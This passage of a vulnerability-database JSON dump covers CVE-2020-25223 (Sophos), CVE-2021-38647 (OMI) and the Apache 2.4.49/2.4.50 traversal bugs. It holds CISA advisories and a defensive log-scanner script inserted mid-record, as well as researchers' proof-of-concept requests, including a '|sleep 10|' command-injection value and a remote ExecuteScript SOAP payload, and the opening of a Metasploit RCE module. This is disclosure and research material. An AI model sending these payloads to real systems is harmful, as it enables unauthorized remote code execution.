172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 33\n >\n * upload completely sent off: 33 out of 33 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 04:17:09 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < 
Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n wvu@kharak:~$\n \n \n \n host:/root # ls -l /tmp/vulnerable\n -rw-r--r-- 1 root root 0 Aug 25 23:17 /tmp/vulnerable\n host:/root #\n \n\nChecking for the vulnerability can be accomplished by injecting a `sleep` command and timing the request\u2019s completion:\n \n \n wvu@kharak:~$ time curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|sleep 10|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 
(OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 20\n >\n * upload completely sent off: 20 out of 20 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 15:47:17 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left 
intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n \n real\t0m10.114s\n user\t0m0.020s\n sys\t0m0.018s\n wvu@kharak:~$\n \n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2020-25223", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2020-09-23T00:00:00", "id": "AKB:0B46025D-A4C7-4FB0-ADA5-7244A30E7D6E", "href": "https://attackerkb.com/topics/MJewDF16Kl/cve-2020-25223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T20:36:58", "description": "Open Management Infrastructure Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 4:37am UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ 
curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n 
<p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More 
context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\n**noraj** at March 31, 2022 8:33pm UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n 
<wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT 
xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-38647", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T00:00:00", "id": "AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "href": "https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2023-02-09T14:00:22", "description": "_(Updated October 7, 2021)_\n\nApache has released additional fixes for CVE-2021-41773, which is tracked as [CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>). 
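An added example for the two Apache bugs this bulletin covers, written for this page rather than taken from CISA, Apache or any of the exploit modules further down: a Python scanner that walks Apache access-log lines and reports requests whose path climbs above the document root once percent-encoding is undone. It decodes repeatedly, because the 2.4.50 fix stopped the single-encoded `.%2e` form (CVE-2021-41773) but not the double-encoded `.%%32%65` form (CVE-2021-42013). The log lines, addresses and timestamps are constructed for the demonstration, and the `/cgi-bin/` prefix is an assumption about where ScriptAlias points on the server being checked.

```python
"""Flag CVE-2021-41773 / CVE-2021-42013 traversal attempts in Apache access logs.

Added example for this page; it is not CISA's, Apache's, or any exploit
module's code. The log lines below are constructed for the demonstration.
"""
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format). Addresses come from the
# documentation ranges; nothing here is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2021:10:12:01 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1421
203.0.113.5 - - [06/Oct/2021:10:12:07 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 88
198.51.100.9 - - [06/Oct/2021:10:13:44 +0000] "GET /icons/../index.html HTTP/1.1" 200 3120
198.51.100.9 - - [06/Oct/2021:10:14:02 +0000] "GET /cgi-bin/status.cgi?x=1 HTTP/1.1" 200 512
192.0.2.77 - - [06/Oct/2021:10:15:30 +0000] "GET /static/%2e%2e/%2e%2e/secret.txt HTTP/1.1" 403 199
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Prefixes mapped to a CGI handler in this (assumed) server config; traversal
# through one of these is what turns file disclosure into command execution.
CGI_PREFIXES = ('/cgi-bin/',)


def decode_fully(path, max_rounds=3):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds). One round turns '.%2e' into '..'; two rounds
    are needed for '.%%32%65', the form that slipped past the 2.4.50 fix.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def escapes_root(path):
    """Walk the segments and report whether '..' ever climbs above the root."""
    depth = 0
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def analyze_line(line):
    """Return a finding dict for a traversal attempt, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group('target').split('?', 1)[0]   # drop the query string
    decoded, rounds = decode_fully(path)
    if not escapes_root(decoded):
        return None
    return {
        'ip': m.group('ip'),
        'method': m.group('method'),
        'status': m.group('status'),
        'raw_path': path,
        'decoded_path': decoded,
        # 'single' is the CVE-2021-41773 form; 'double' is the CVE-2021-42013
        # bypass of the 2.4.50 fix.
        'encoding': ('none', 'single', 'double')[min(rounds, 2)],
        'cgi_path': path.startswith(CGI_PREFIXES),
    }


def scan_log(text):
    """Run analyze_line over every line and keep the findings, in log order."""
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        tag = 'RCE-capable' if hit['cgi_path'] else 'file read'
        print(f"{hit['ip']} {hit['method']} {hit['raw_path']} -> {hit['decoded_path']} "
              f"[{hit['encoding']}-encoded, {tag}, HTTP {hit['status']}]")
```

Findings under a CGI-mapped prefix deserve the first look, since CGI being enabled is the condition under which traversal turns into command execution. Paths that stay inside the root are not reported, encoded or not, because Apache normalizes those correctly and they are common in legitimate traffic. A 403 (as on the last sample line) still counts as an attempt worth correlating with the source address.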
For more information see the [Apache vulnerabilities page](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>). \n\n_(Originally published October 6, 2021)_\n\nThe Apache Software Foundation has released Apache HTTP Server version 2.4.50 to address two vulnerabilities. An attacker could exploit these vulnerabilities to take control of an affected system. One vulnerability, [CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>), has been exploited in the wild. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Apache HTTP Server 2.4.50 vulnerabilities page](<https://httpd.apache.org/>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:78B08801DAA7C3B8A2D34A5790730C76", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:26:07", "description": "On October 7, 2021, the Apache Software Foundation released [Apache HTTP Server version 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) to address Path Traversal and Remote Code Execution vulnerabilities (CVE-2021-41773, CVE-2021-42013) in Apache HTTP Server 2.4.49 and 2.4.50. These vulnerabilities have been exploited in the wild. \n\nCISA is also seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation. 
CISA urges organizations to [patch](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) immediately if they haven\u2019t already\u2014this cannot wait until after the holiday weekend.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "cisa", "title": "Apache Releases HTTP Server version 2.4.51 to Address Vulnerabilities Under Exploitation ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:76FE595B1B89D06301E16CB8087D39BD", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:29", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164629", "href": "https://packetstormsecurity.com/files/164629/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE', \n'Description' => %q{ \nThis module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). \nIf files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, \nit can be used to execute arbitrary commands (Remote Command Execution). \nThis vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013). 
\n}, \n'References' => [ \n['CVE', '2021-41773'], \n['CVE', '2021-42013'], \n['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'], \n['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'], \n['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis'] \n], \n'Author' => [ \n'Ash Daulton', # Vulnerability discovery \n'Dhiraj Mishra', # Metasploit auxiliary module \n'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise) \n], \n'DisclosureDate' => '2021-05-10', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path', \n'Action' => 'CHECK_RCE', \n'RPORT' => 443, \n'SSL' => true \n}, \n'Targets' => [ \n[ \n'Automatic (Dropper)', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :linux_dropper, \n'DefaultOptions' 